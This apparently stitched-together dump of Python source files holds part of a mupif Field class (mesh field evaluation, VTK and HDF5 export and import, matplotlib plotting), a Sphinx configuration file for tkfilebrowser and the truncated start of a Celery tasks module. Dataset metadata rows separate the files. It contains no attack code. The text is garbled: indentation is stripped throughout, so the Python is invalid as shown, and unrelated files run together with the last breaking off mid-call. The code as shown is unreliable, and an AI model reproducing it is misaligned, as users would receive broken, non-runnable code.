return PhysicalQuantity(self._evaluate(positions, eps), self.unit)
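    # Hedged usage sketch (not part of the original class); the position values and
    # the field instance are illustrative:
    #
    #   q = field.evaluate((0.5, 0.2, 0.0))                  # single point -> PhysicalQuantity
    #   first_component = q.getValue()[0]
    #   qs = field.evaluate([(0., 0., 0.), (1., 1., 0.)])    # list of points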
def _evaluate(self, position, eps):
"""
Evaluates the receiver at a single spatial position.
:param tuple position: 1D/2D/3D position vector
:param float eps: Optional tolerance
:return: field value
:rtype: tuple of doubles
.. note:: This method has some issues related to https://sourceforge.net/p/mupif/tickets/22/ .
"""
cells = self.mesh.giveCellLocalizer().giveItemsInBBox(BBox.BBox([c-eps for c in position], [c+eps for c in position]))
# answer=None
if len(cells):
if self.fieldType == FieldType.FT_vertexBased:
for icell in cells:
try:
if icell.containsPoint(position):
if debug:
log.debug(icell.getVertices())
try:
answer = icell.interpolate(position, [self.value[i.number] for i in icell.getVertices()])
except IndexError:
log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label)
raise
return answer
except ZeroDivisionError:
print('ZeroDivisionError?')
log.debug(icell.number)
log.debug(position)
icell.debug = 1
log.debug(icell.containsPoint(position), icell.glob2loc(position))
log.error('Field::evaluate - no source cell found for position %s' % str(position))
for icell in cells:
log.debug(icell.number)
log.debug(icell.containsPoint(position))
log.debug(icell.glob2loc(position))
else: # if (self.fieldType == FieldType.FT_vertexBased):
# in case of cell based fields do compute average of cell values containing point
# this typically happens when point is on the shared edge or vertex
count = 0
for icell in cells:
if icell.containsPoint(position):
if debug:
log.debug(icell.getVertices())
try:
tmp = self.value[icell.number]
if count == 0:
answer = list(tmp)
else:
                                answer = [x + y for x, y in zip(answer, tmp)]
count += 1
except IndexError:
log.error('Field::evaluate failed, inconsistent data at cell %d' % icell.label)
log.error(icell.getVertices())
raise
# end loop over icells
if count == 0:
log.error('Field::evaluate - no source cell found for position %s', str(position))
# for icell in cells:
# log.debug(icell.number, icell.containsPoint(position), icell.glob2loc(position))
else:
answer = [x/count for x in answer]
return answer
else:
# no source cell found
log.error('Field::evaluate - no source cell found for position ' + str(position))
raise ValueError('Field::evaluate - no source cell found for position ' + str(position))
def getVertexValue(self, vertexID):
"""
Returns the value associated with a given vertex.
:param int vertexID: Vertex identifier
:return: The value
:rtype: Physics.PhysicalQuantity
"""
if self.fieldType == FieldType.FT_vertexBased:
return PhysicalQuantity(self.value[vertexID], self.unit)
else:
            raise TypeError('Attempt to access vertex value of cell based field, use evaluate instead')
def getCellValue(self, cellID):
"""
Returns the value associated with a given cell.
:param int cellID: Cell identifier
:return: The value
:rtype: Physics.PhysicalQuantity
"""
if self.fieldType == FieldType.FT_cellBased:
return PhysicalQuantity(self.value[cellID], self.unit)
else:
            raise TypeError('Attempt to access cell value of vertex based field, use evaluate instead')
def _giveValue(self, componentID):
"""
Returns the value associated with a given component (vertex or cell).
        Deprecated, use getVertexValue() or getCellValue()
:param int componentID: An identifier of a component: vertexID or cellID
:return: The value
:rtype: Physics.PhysicalQuantity
"""
return PhysicalQuantity(self.value[componentID], self.unit)
def giveValue(self, componentID):
"""
Returns the value associated with a given component (vertex or cell).
:param int componentID: An identifier of a component: vertexID or cellID
:return: The value
:rtype: tuple
"""
return self.value[componentID]
def setValue(self, componentID, value):
"""
Sets the value associated with a given component (vertex or cell).
:param int componentID: An identifier of a component: vertexID or cellID
:param tuple value: Value to be set for a given component, should have the same units as receiver
.. Note:: If a mesh has mapping attached (a mesh view) then we have to remember value locally and record change. The source field values are updated after commit() method is invoked.
"""
self.value[componentID] = value
def commit(self):
"""
Commits the recorded changes (via setValue method) to a primary field.
"""
def getObjectID(self):
"""
Returns field objectID.
:return: Object's ID
:rtype: int
"""
return self.objectID
def getUnits(self):
"""
:return: Returns units of the receiver
:rtype: Physics.PhysicalUnits
"""
return self.unit
def merge(self, field):
"""
        Merges the receiver with the given field. Both fields should cover different parts of the domain (they can also overlap), but should refer to the same underlying discretization, otherwise unpredictable results can occur.
:param Field field: given field to merge with.
"""
# first merge meshes
mesh = copy.deepcopy(self.mesh)
mesh.merge(field.mesh)
log.debug(mesh)
# merge the field values
# some type checking first
if self.fieldType != field.fieldType:
raise TypeError("Field::merge: fieldType of receiver and parameter is different")
if self.fieldType == FieldType.FT_vertexBased:
values = [0]*mesh.getNumberOfVertices()
for v in range(self.mesh.getNumberOfVertices()):
values[mesh.vertexLabel2Number(self.mesh.getVertex(v).label)] = self.value[v]
for v in range(field.mesh.getNumberOfVertices()):
values[mesh.vertexLabel2Number(field.mesh.getVertex(v).label)] = field.value[v]
else:
values = [0]*mesh.getNumberOfCells()
for v in range(self.mesh.getNumberOfCells()):
values[mesh.cellLabel2Number(self.mesh.giveCell(v).label)] = self.value[v]
for v in range(field.mesh.getNumberOfCells()):
values[mesh.cellLabel2Number(field.mesh.giveCell(v).label)] = field.value[v]
self.mesh = mesh
self.value = values
def field2VTKData (self, name=None, lookupTable=None):
"""
Creates VTK representation of the receiver. Useful for visualization. Requires pyvtk module.
:param str name: human-readable name of the field
:param pyvtk.LookupTable lookupTable: color lookup table
:return: Instance of pyvtk
:rtype: pyvtk.VtkData
"""
import pyvtk
if name is None:
name = self.getFieldIDName()
if lookupTable and not isinstance(lookupTable, pyvtk.LookupTable):
log.info('ignoring lookupTable which is not a pyvtk.LookupTable instance.')
lookupTable = None
if lookupTable is None:
lookupTable=pyvtk.LookupTable([(0, .231, .298, 1.0), (.4, .865, .865, 1.0), (.8, .706, .016, 1.0)], name='coolwarm')
# Scalars use different name than 'coolwarm'. Then Paraview uses its own color mapping instead of taking
# 'coolwarm' from *.vtk file. This prevents setting Paraview's color mapping.
scalarsKw = dict(name=name, lookup_table='default')
else:
scalarsKw = dict(name=name, lookup_table=lookupTable.name)
# see http://cens.ioc.ee/cgi-bin/cvsweb/python/pyvtk/examples/example1.py?rev=1.3 for an example
vectorsKw = dict(name=name) # vectors don't have a lookup_table
if self.fieldType == FieldType.FT_vertexBased:
if self.getValueType() == ValueType.Scalar:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Vector:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Vectors(self.value, **vectorsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Tensor:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.PointData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example')
else:
if self.getValueType() == ValueType.Scalar:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Scalars([val[0] for val in self.value], **scalarsKw), lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Vector:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Vectors(self.value, **vectorsKw),lookupTable), 'Unstructured Grid Example')
elif self.getValueType() == ValueType.Tensor:
return pyvtk.VtkData(self.mesh.getVTKRepresentation(), pyvtk.CellData(pyvtk.Tensors(self.getMartixForTensor(self.value), **vectorsKw), lookupTable), 'Unstructured Grid Example')
def getMartixForTensor(self, values):
"""
Reshape values to a list with 3x3 arrays. Usable for VTK export.
:param list values: List containing tuples of 9 values, e.g. [(1,2,3,4,5,6,7,8,9), (1,2,3,4,5,6,7,8,9), ...]
:return: List containing 3x3 matrices for each tensor
:rtype: list
"""
tensor = []
for i in values:
tensor.append(numpy.reshape(i, (3, 3)))
return tensor
def dumpToLocalFile(self, fileName, protocol=pickle.HIGHEST_PROTOCOL):
"""
Dump Field to a file using a Pickle serialization module.
:param str fileName: File name
:param int protocol: Used protocol - 0=ASCII, 1=old binary, 2=new binary
"""
pickle.dump(self, open(fileName, 'wb'), protocol)
def field2Image2D(self, plane='xy', elevation=(-1.e-6, 1.e-6), numX=10, numY=20, interp='linear', fieldComponent=0, vertex=True, colorBar='horizontal', colorBarLegend='', barRange=(None, None), barFormatNum='%.3g', title='', xlabel='', ylabel='', fileName='', show=True, figsize=(8, 4), matPlotFig=None):
"""
        Plots and/or saves a 2D image using the matplotlib library. Works for structured and unstructured 2D/3D fields; 2D/3D fields need to define a plane. This method gives only basic viewing options; for aesthetic and more elaborate output use e.g. VTK field export with
        postprocessors such as ParaView or Mayavi. Idea from https://docs.scipy.org/doc/scipy/reference/tutorial/interpolate.html#id1
:param str plane: what plane to extract from field, valid values are 'xy', 'xz', 'yz'
        :param tuple elevation: range of the third coordinate. For example, in plane='xy' it grabs z coordinates in the range
:param int numX: number of divisions on x graph axis
:param int numY: number of divisions on y graph axis
:param str interp: interpolation type when transferring to a grid. Valid values 'linear', 'nearest' or 'cubic'
:param int fieldComponent: component of the field
        :param bool vertex: if vertices should be plotted as points
:param str colorBar: color bar details. Valid values '' for no colorbar, 'vertical' or 'horizontal'
:param str colorBarLegend: Legend for color bar. If '', current field name and units are printed. None prints nothing.
        :param tuple barRange: min and max bar range. If barRange=(None, None), it is adjusted automatically
:param str barFormatNum: format of color bar numbers
:param str title: title
:param str xlabel: x axis label
:param str ylabel: y axis label
:param str fileName: if nonempty, a filename is written to the disk, usually png, pdf, ps, eps and svg are supported
        :param bool show: if the plot should be shown
        :param tuple figsize: size of canvas in inches. Affects only showing a figure. Saving an image to a file adjusts one side automatically.
        :param obj matPlotFig: handle to a previously created matplotlib figure to draw into; None creates a new figure
:return: handle to matPlotFig
:rtype: matPlotFig
"""
try:
import numpy as np
import math
from scipy.interpolate import griddata
import matplotlib
matplotlib.use('TkAgg') # Qt4Agg gives an empty, black window
import matplotlib.pyplot as plt
except ImportError as e:
log.error('Skipping field2Image2D due to missing modules: %s' % e)
return None
# raise
if self.fieldType != FieldType.FT_vertexBased:
raise APIError.APIError('Only FieldType.FT_vertexBased is now supported')
mesh = self.getMesh()
numVertices = mesh.getNumberOfVertices()
indX = 0
indY = 0
elev = 0
if plane == 'xy':
indX = 0
indY = 1
elev = 2
elif plane == 'xz':
indX = 0
indY = 2
elev = 1
elif plane == 'yz':
indX = 1
indY = 2
elev = 0
# find eligible vertex points and values
vertexPoints = []
vertexValue = []
for i in range(0, numVertices):
coords = mesh.getVertex(i).getCoordinates()
# print(coords)
value = self.giveValue(i)[fieldComponent]
if elevation[1] > coords[elev] > elevation[0]:
vertexPoints.append((coords[indX], coords[indY]))
vertexValue.append(value)
if len(vertexPoints) == 0:
log.info('No valid vertex points found, putting zeros on domain 1 x 1')
for i in range(5):
vertexPoints.append((i % 2, i/4.))
vertexValue.append(0)
# for i in range (0, len(vertexPoints)):
# print (vertexPoints[i], vertexValue[i])
vertexPointsArr = np.array(vertexPoints)
vertexValueArr = np.array(vertexValue)
xMin = vertexPointsArr[:, 0].min()
xMax = vertexPointsArr[:, 0].max()
yMin = vertexPointsArr[:, 1].min()
yMax = vertexPointsArr[:, 1].max()
# print(xMin, xMax, yMin, yMax)
grid_x, grid_y = np.mgrid[xMin:xMax:complex(0, numX), yMin:yMax:complex(0, numY)]
grid_z1 = griddata(vertexPointsArr, vertexValueArr, (grid_x, grid_y), interp)
# print (grid_z1.T)
        plt.ion()  # interactive mode
if matPlotFig is None:
matPlotFig = plt.figure(figsize=figsize)
# plt.xlim(xMin, xMax)
# plt.ylim(yMin, yMax)
plt.clf()
plt.axis((xMin, xMax, yMin, yMax))
image = plt.imshow(grid_z1.T, extent=(xMin, xMax, yMin, yMax), origin='lower', aspect='equal')
# plt.margins(tight=True)
# plt.tight_layout()
# plt.margins(x=-0.3, y=-0.3)
if colorBar:
cbar = plt.colorbar(orientation=colorBar, format=barFormatNum)
if colorBarLegend is not None:
if colorBarLegend == '':
colorBarLegend = self.getFieldIDName() + '_' + str(fieldComponent)
if self.unit is not None:
colorBarLegend = colorBarLegend + ' (' + self.unit.name() + ')'
cbar.set_label(colorBarLegend, rotation=0 if colorBar == 'horizontal' else 90)
if title:
plt.title(title)
if xlabel:
plt.xlabel(xlabel)
if ylabel:
plt.ylabel(ylabel)
if vertex == 1:
plt.scatter(vertexPointsArr[:, 0], vertexPointsArr[:, 1], marker='o', c='b', s=5, zorder=10)
# plt.axis('equal')
# plt.gca().set_aspect('equal', adjustable='box-forced')
if isinstance(barRange[0], float) or isinstance(barRange[0], int):
image.set_clim(vmin=barRange[0], vmax=barRange[1])
if fileName:
plt.savefig(fileName, bbox_inches='tight')
if show:
matPlotFig.canvas.draw()
# plt.ioff()
# plt.show(block=True)
return matPlotFig
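    # Hedged usage sketch (not part of the original class); the plane, component and
    # file name are illustrative:
    #
    #   fig = field.field2Image2D(plane='xy', fieldComponent=0, fileName='temperature.png')
    #   field.field2Image2DBlock()   # block until the interactive window is closed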
def field2Image2DBlock(self):
"""
Block an open window from matPlotLib. Waits until closed.
"""
import matplotlib.pyplot as plt
plt.ioff()
plt.show(block=True)
def toHdf5(self, fileName, group='component1/part1'):
"""
Dump field to HDF5, in a simple format suitable for interoperability (TODO: document).
:param str fileName: HDF5 file
:param str group: HDF5 group the data will be saved under.
The HDF hierarchy is like this::
group
|
+--- mesh_01 {hash=25aa0aa04457}
| +--- [vertex_coords]
| +--- [cell_types]
| \--- [cell_vertices]
+--- mesh_02 {hash=17809e2b86ea}
| +--- [vertex_coords]
| +--- [cell_types]
| \--- [cell_vertices]
+--- ...
+--- field_01
| +--- -> mesh_01
| \--- [vertex_values]
+--- field_02
| +--- -> mesh_01
| \--- [vertex_values]
+--- field_03
| +--- -> mesh_02
| \--- [cell_values]
\--- ...
where ``plain`` names are HDF (sub)groups, ``[bracketed]`` names are datasets, ``{name=value}`` are HDF attributes, ``->`` prefix indicated HDF5 hardlink (transparent to the user); numerical suffixes (``_01``, ...) are auto-allocated. Mesh objects are hardlinked using HDF5 hardlinks if an identical mesh is already stored in the group, based on hexdigest of its full data.
.. note:: This method has not been tested yet. The format is subject to future changes.
"""
import h5py
hdf = h5py.File(fileName, 'a', libver='latest')
if group not in hdf:
gg = hdf.create_group(group)
else:
gg = hdf[group]
# raise IOError('Path "%s" is already used in "%s".'%(path,fileName))
def lowestUnused(trsf, predicate, start=1):
"""
Find the lowest unused index, where *predicate* is used to test for existence, and *trsf* transforms
integer (starting at *start* and incremented until unused value is found) to whatever predicate accepts
as argument. Lowest transformed value is returned.
"""
import itertools
for i in itertools.count(start=start):
t = trsf(i)
if not predicate(t):
return t
# save mesh (not saved if there already)
newgrp = lowestUnused(trsf=lambda i: 'mesh_%02d' % i, predicate=lambda t: t in gg)
mh5 = self.getMesh().asHdf5Object(parentgroup=gg, newgroup=newgrp)
if self.value:
fieldGrp = hdf.create_group(lowestUnused(trsf=lambda i, group=group: group+'/field_%02d' % i, predicate=lambda t: t in hdf))
fieldGrp['mesh'] = mh5
fieldGrp.attrs['fieldID'] = self.fieldID
fieldGrp.attrs['valueType'] = self.valueType
# string/bytes may not contain NULL when stored as string in HDF5
# see http://docs.h5py.org/en/2.3/strings.html
# that's why we cast to opaque type "void" and uncast using tostring before unpickling
fieldGrp.attrs['units'] = numpy.void(pickle.dumps(self.unit))
fieldGrp.attrs['time'] = numpy.void(pickle.dumps(self.time))
# fieldGrp.attrs['time']=self.time.getValue()
if self.fieldType == FieldType.FT_vertexBased:
val = numpy.empty(shape=(self.getMesh().getNumberOfVertices(), self.getRecordSize()), dtype=numpy.float)
for vert in range(self.getMesh().getNumberOfVertices()):
val[vert] = self.getVertexValue(vert).getValue()
fieldGrp['vertex_values'] = val
elif self.fieldType == FieldType.FT_cellBased:
# raise NotImplementedError("Saving cell-based fields to HDF5 is not yet implemented.")
val = numpy.empty(shape=(self.getMesh().getNumberOfCells(), self.getRecordSize()), dtype=numpy.float)
for cell in range(self.getMesh().getNumberOfCells()):
val[cell] = self.getCellValue(cell)
fieldGrp['cell_values'] = val
else:
raise RuntimeError("Unknown fieldType %d." % self.fieldType)
@staticmethod
def makeFromHdf5(fileName, group='component1/part1'):
"""
Restore Fields from HDF5 file.
:param str fileName: HDF5 file
:param str group: HDF5 group the data will be read from (IOError is raised if the group does not exist).
:return: list of new :obj:`Field` instances
:rtype: [Field,Field,...]
.. note:: This method has not been tested yet.
"""
import h5py
hdf = h5py.File(fileName, 'r', libver='latest')
grp = hdf[group]
# load mesh and field data from HDF5
meshObjs = [obj for name, obj in grp.items() if name.startswith('mesh_')]
fieldObjs = [obj for name, obj in grp.items() if name.startswith('field_')]
# construct all meshes as mupif objects
meshes = [Mesh.Mesh.makeFromHdf5Object(meshObj) for meshObj in meshObjs]
# construct all fields as mupif objects
ret = []
for f in fieldObjs:
if 'vertex_values' in f:
fieldType, values = FieldType.FT_vertexBased, f['vertex_values']
elif 'cell_values' in f:
fieldType, values = FieldType.FT_cellBased, f['cell_values']
else:
                raise ValueError("HDF5/mupif format error: unable to determine field type.")
fieldID, valueType, units, time = FieldID(f.attrs['fieldID']), f.attrs['valueType'], f.attrs['units'].tostring(), f.attrs['time'].tostring()
if units == '':
units = None # special case, handled at saving time
else:
units = pickle.loads(units)
if time == '':
time = None # special case, handled at saving time
else:
time = pickle.loads(time)
meshIndex = meshObjs.index(f['mesh']) # find which mesh object this field refers to
ret.append(Field(mesh=meshes[meshIndex], fieldID=fieldID, units=units, time=time, valueType=valueType, values=values, fieldType=fieldType))
return ret
def toVTK2(self, fileName, format='ascii'):
"""
Save the instance as Unstructured Grid in VTK2 format (``.vtk``).
:param str fileName: where to save
:param str format: one of ``ascii`` or ``binary``
"""
self.field2VTKData().tofile(filename=fileName, format=format)
@staticmethod
def makeFromVTK2(fileName, unit, time=0, skip=['coolwarm']):
"""
Return fields stored in *fileName* in the VTK2 (``.vtk``) format.
:param str fileName: filename to load from
        :param PhysicalUnit unit: physical unit of field values
:param float time: time value for created fields (time is not saved in VTK2, thus cannot be recovered)
        :param [string,] skip: names of data arrays to be skipped when reading the input file; the default value skips the default coolwarm colormap.
        :returns: fields read from the VTK file (one :obj:`Field` per data array)
        :rtype: [Field,Field,...]
"""
import pyvtk
from .dataID import FieldID
if not fileName.endswith('.vtk'):
log.warning('Field.makeFromVTK2: fileName should end with .vtk, you may get in trouble (proceeding).')
ret = []
try:
data = pyvtk.VtkData(fileName) # this is where reading the file happens (inside pyvtk)
except NotImplementedError:
log.info('pyvtk fails to open (binary?) file "%s", trying through vtk.vtkGenericDataReader.' % fileName)
return Field.makeFromVTK3(fileName, time=time, units=unit, forceVersion2=True)
ugr = data.structure
if not isinstance(ugr, pyvtk.UnstructuredGrid):
raise NotImplementedError(
"grid type %s is not handled by mupif (only UnstructuredGrid is)." % ugr.__class__.__name__)
mesh = Mesh.UnstructuredMesh.makeFromPyvtkUnstructuredGrid(ugr)
# get cell and point data
pd, cd = data.point_data.data, data.cell_data.data
for dd, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased):
for d in dd:
# will raise KeyError if fieldID with that name is not defined
if d.name in skip:
continue
fid = FieldID[d.name]
# determine the number of components using the expected number of values from the mesh
expectedNumVal = (mesh.getNumberOfVertices() if fieldType == FieldType.FT_vertexBased else mesh.getNumberOfCells())
nc = len(d.scalars)//expectedNumVal
valueType = ValueType.fromNumberOfComponents(nc)
                values = [d.scalars[i*nc:i*nc+nc] for i in range(expectedNumVal)]
ret.append(Field(
mesh=mesh,
fieldID=fid,
units=unit, # not stored at all
time=time, # not stored either, set by caller
valueType=valueType,
values=values,
fieldType=fieldType
))
return ret
def toVTK3(self, fileName, **kw):
"""
Save the instance as Unstructured Grid in VTK3 format (``.vtu``). This is a simple proxy for calling :obj:`manyToVTK3` with the instance as the only field to be saved. If multiple fields with identical mesh are to be saved in VTK3, use :obj:`manyToVTK3` directly.
:param fileName: output file name
:param ``**kw``: passed to :obj:`manyToVTK3`
"""
return self.manyToVTK3([self], fileName, **kw)
@staticmethod
def manyToVTK3(fields, fileName, ascii=False, compress=True):
"""
Save all fields passed as argument into VTK3 Unstructured Grid file (``*.vtu``).
All *fields* must be defined on the same mesh object; exception will be raised if this is not the case.
:param list of Field fields:
:param fileName: output file name
        :param bool ascii: write numbers as ASCII in the XML-based VTU file (rather than base64-encoded binary in XML)
:param bool compress: apply compression to the data
"""
import vtk
if not fields:
raise ValueError('At least one field must be passed.')
# check if all fields are defined on the same mesh
if len(set([f.mesh for f in fields])) != 1:
raise RuntimeError(
                'Not all fields are sharing the same Mesh object (and could not be saved to a single .vtu file)')
# convert mesh to VTK UnstructuredGrid
mesh = fields[0].getMesh()
vtkgrid = mesh.asVtkUnstructuredGrid()
# add fields as arrays
for f in fields:
arr = vtk.vtkDoubleArray()
arr.SetNumberOfComponents(f.getRecordSize())
arr.SetName(f.getFieldIDName())
assert f.getFieldType() in (FieldType.FT_vertexBased, FieldType.FT_cellBased) # other future types not handled
if f.getFieldType() == FieldType.FT_vertexBased:
nn = mesh.getNumberOfVertices()
else:
nn = mesh.getNumberOfCells()
arr.SetNumberOfValues(nn)
for i in range(nn):
arr.SetTuple(i, f.giveValue(i))
if f.getFieldType() == FieldType.FT_vertexBased:
vtkgrid.GetPointData().AddArray(arr)
else:
vtkgrid.GetCellData().AddArray(arr)
# write the unstructured grid to file
writer = vtk.vtkXMLUnstructuredGridWriter()
if compress:
writer.SetCompressor(vtk.vtkZLibDataCompressor())
if ascii:
writer.SetDataModeToAscii()
writer.SetFileName(fileName)
# change between VTK5 and VTK6
        if vtk.vtkVersion().GetVTKMajorVersion() >= 6:
            writer.SetInputData(vtkgrid)
        else:
            writer.SetInput(vtkgrid)
writer.Write()
# finito
@staticmethod
def makeFromVTK3(fileName, units, time=0, forceVersion2=False):
"""
Create fields from a VTK unstructured grid file (``.vtu``, format version 3, or ``.vtp`` with *forceVersion2*); the mesh is shared between fields.
``vtk.vtkXMLGenericDataObjectReader`` is used to open the file (unless *forceVersion2* is set), but it is checked that contained dataset is a ``vtk.vtkUnstructuredGrid`` and an error is raised if not.
.. note:: Units are not supported when loading from VTK, all fields will have ``None`` unit assigned.
:param str fileName: VTK (``*.vtu``) file
:param PhysicalUnit units: units of read values
:param float time: time value for created fields (time is not saved in VTK3, thus cannot be recovered)
        :param bool forceVersion2: if ``True``, ``vtk.vtkGenericDataObjectReader`` (for VTK version 2) will be used to open the file, instead of ``vtk.vtkXMLGenericDataObjectReader``; this also supposes *fileName* ends with ``.vtk`` (not checked, but may cause an error).
:return: list of new :obj:`Field` instances
:rtype: [Field,Field,...]
"""
import vtk
from .dataID import FieldID
# rr=vtk.vtkXMLUnstructuredGridReader()
if forceVersion2 or fileName.endswith('.vtk'):
rr = vtk.vtkGenericDataObjectReader()
else:
rr = vtk.vtkXMLGenericDataObjectReader()
rr.SetFileName(fileName)
rr.Update()
ugrid = rr.GetOutput()
if not isinstance(ugrid, vtk.vtkUnstructuredGrid):
raise RuntimeError("vtkDataObject read from '%s' must be a vtkUnstructuredGrid (not a %s)" % (
fileName, ugrid.__class__.__name__))
# import sys
# sys.stderr.write(str((ugrid,ugrid.__class__,vtk.vtkUnstructuredGrid)))
# make mesh -- implemented separately
mesh = Mesh.UnstructuredMesh.makeFromVtkUnstructuredGrid(ugrid)
# fields which will be returned
ret = []
# get cell and point data
cd, pd = ugrid.GetCellData(), ugrid.GetPointData()
for data, fieldType in (pd, FieldType.FT_vertexBased), (cd, FieldType.FT_cellBased):
for idata in range(data.GetNumberOfArrays()):
                aname, arr = data.GetArrayName(idata), data.GetArray(idata)
nt = arr.GetNumberOfTuples()
if nt == 0:
raise RuntimeError("Zero values in field '%s', unable to determine value type." % aname)
t0 = arr.GetTuple(0)
valueType = ValueType.fromNumberOfComponents(len(arr.GetTuple(0)))
# this will raise KeyError if fieldID with that name not defined
fid = FieldID[aname]
# get actual values as tuples
values = [arr.GetTuple(t) for t in range(nt)]
ret.append(Field(
mesh=mesh,
fieldID=fid,
units=units, # not stored at all
time=time, # not stored either, set by caller
valueType=valueType,
values=values,
fieldType=fieldType
))
return ret
def _sum(self, other, sign1, sign2):
"""
Should return a new instance. As deep copy is expensive,
this operation should be avoided. Better to modify the field values.
"""
raise TypeError('Not supported')
def inUnitsOf(self, *units):
"""
Should return a new instance. As deep copy is expensive,
this operation should be avoided. Better to use convertToUnits method
performing in place conversion.
"""
raise TypeError('Not supported')
# def __deepcopy__(self, memo):
# """ Deepcopy operatin modified not to include attributes starting with underscore.
# These are supposed to be the ones valid only to s specific copy of the receiver.
# An example of these attributes are _PyroURI (injected by Application),
# where _PyroURI contains the URI of specific object, the copy should receive
# its own URI
# """
# cls = self.__class__
# dpcpy = cls.__new__(cls)
#
# memo[id(self)] = dpcpy
# for attr in dir(self):
# if not attr.startswith('_'):
# value = getattr(self, attr)
# setattr(dpcpy, attr, copy.deepcopy(value, memo))
# return dpcpy
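# ---------------------------------------------------------------------------
# Illustrative usage sketch added for clarity; it is NOT part of the original
# mupif API.  It only assumes the toHdf5/makeFromHdf5 methods defined above and
# a pre-existing Field instance supplied by the caller; file and group names
# are arbitrary placeholders.
def _example_hdf5_roundtrip(field, fileName='fields.h5', group='component1/part1'):
    """Save *field* to HDF5 and read it back, returning the restored fields."""
    field.toHdf5(fileName=fileName, group=group)
    return Field.makeFromHdf5(fileName=fileName, group=group)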
| lgpl-3.0 | 7,138,186,339,437,092,000 | 43.094008 | 381 | 0.597896 | false |
j4321/tkFileBrowser | docs/conf.py | 1 | 5256 | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
# -- Project information -----------------------------------------------------
project = 'tkfilebrowser'
copyright = '2018, Juliette Monsel'
author = 'Juliette Monsel'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '2.2.5'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'tango'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'sphinx_rtd_theme'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
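# Example (illustrative only, kept commented out like the other defaults above;
# these are standard sphinx_rtd_theme options):
#
# html_theme_options = {
#     'collapse_navigation': False,
#     'navigation_depth': 3,
# }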
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'tkfilebrowserdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'tkfilebrowser.tex', 'tkfilebrowser Documentation',
'Juliette Monsel', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'tkfilebrowser', 'tkfilebrowser Documentation',
author, 'tkfilebrowser', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
| gpl-3.0 | 8,686,003,906,744,522,000 | 29.034286 | 79 | 0.649543 | false |
unisport/thumblr | thumblr/tasks.py | 1 | 1681 |
from django.conf import settings
from celery import Celery, Task
from raven import Client
import usecases
client = Client(settings.SENTRY_DSN)
celery = Celery('tasks')
celery.conf.update(
AWS_ACCESS_KEY_ID=settings.AWS_ACCESS_KEY_ID,
AWS_SECRET_ACCESS_KEY=settings.AWS_SECRET_ACCESS_KEY,
